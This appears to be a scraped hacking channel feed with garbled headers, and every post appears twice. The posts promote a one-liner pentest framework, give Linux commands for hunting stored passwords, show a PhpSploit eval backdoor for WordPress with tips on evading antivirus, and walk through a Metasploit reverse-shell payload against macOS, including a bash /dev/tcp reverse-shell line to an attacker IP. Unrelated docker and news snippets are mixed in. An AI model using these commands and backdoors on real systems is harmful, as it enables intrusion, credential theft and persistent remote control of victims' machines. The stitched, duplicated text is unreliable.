β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated windows hacking
One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo apt install libncurses5-dev
3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
B) For the rest Linux distros.:
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated windows hacking
One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo apt install libncurses5-dev
3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
B) For the rest Linux distros.:
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - D4Vinci/One-Lin3r: Gives you one-liners that aids in penetration testing operations, privilege escalation and more
Gives you one-liners that aids in penetration testing operations, privilege escalation and more - D4Vinci/One-Lin3r
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME LINUX TIPS :
A) Looting for passwords
Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Old passwords in /etc/security/opasswd
The /etc/security/opasswd file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
B) β οΈ Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
Last edited files
Files that were edited in the last 10 minutes
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
In memory passwords
strings /dev/mem -n10 | grep -i PASS
Find sensitive files
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
(from git)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME LINUX TIPS :
A) Looting for passwords
Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Old passwords in /etc/security/opasswd
The /etc/security/opasswd file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
B) β οΈ Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
Last edited files
Files that were edited in the last 10 minutes
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
In memory passwords
strings /dev/mem -n10 | grep -i PASS
Find sensitive files
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
(from git)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Entos Information & Communication launches electronic access list + face recognition heat detection solution'NARMS
#international #Technologies
#international #Technologies
Forwarded from UNDERCODE NEWS
KT HoldsβCommunication Big Data Platform Road Showβ, which gathered in one place for communication big data
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[βHTTP_PHPSPL01Tβ]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total
ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY
as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[βHTTP_PHPSPL01Tβ]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total
ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY
as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor - nil0x42/phpsploit
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Download & run nginx
1) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
2) [root@localhost my.Shells]# docker pull nginx //δΈθ½½nginx
Using default tag: latest
3) Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete
4) Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d
[root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/nginx latest 3f8a4339aadd 3 weeks ago 108.5 MB
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
4) Run nginx
[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx
c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080
tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c
5) [root@localhost my.Shells]# docker ps //nginxε·²η»ε¨θΏθ‘δΊ
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute
6) Run results
[root@localhost my.Shells]# ./openFirewallPort.sh
---openFirewallPort.sh-------
echo "enter the port: "
read port
firewall-cmd --add-port=$port/tcp
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Download & run nginx
1) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
2) [root@localhost my.Shells]# docker pull nginx //δΈθ½½nginx
Using default tag: latest
3) Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete
4) Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d
[root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/nginx latest 3f8a4339aadd 3 weeks ago 108.5 MB
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
4) Run nginx
[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx
c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080
tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c
5) [root@localhost my.Shells]# docker ps //nginxε·²η»ε¨θΏθ‘δΊ
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute
6) Run results
[root@localhost my.Shells]# ./openFirewallPort.sh
---openFirewallPort.sh-------
echo "enter the port: "
read port
firewall-cmd --add-port=$port/tcp
β β β Uππ»βΊπ«Δπ¬πβ β β β
Docker
Docker Hub Container Image Library | App Containerization
Welcome to the world's largest container registry built for developers and open source contributors to find, use, and share their container images. Build, push and pull.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
The US Spy Agency warns of attacks by Chinese hackers on the army, security and industry.
#CyberAttacks
#CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
pyterpreter script location
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
multi handler
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
set payload lhost lport
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
pyterpreter script location
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
multi handler
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
set payload lhost lport
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."
β β β Uππ»βΊπ«Δπ¬πβ β β β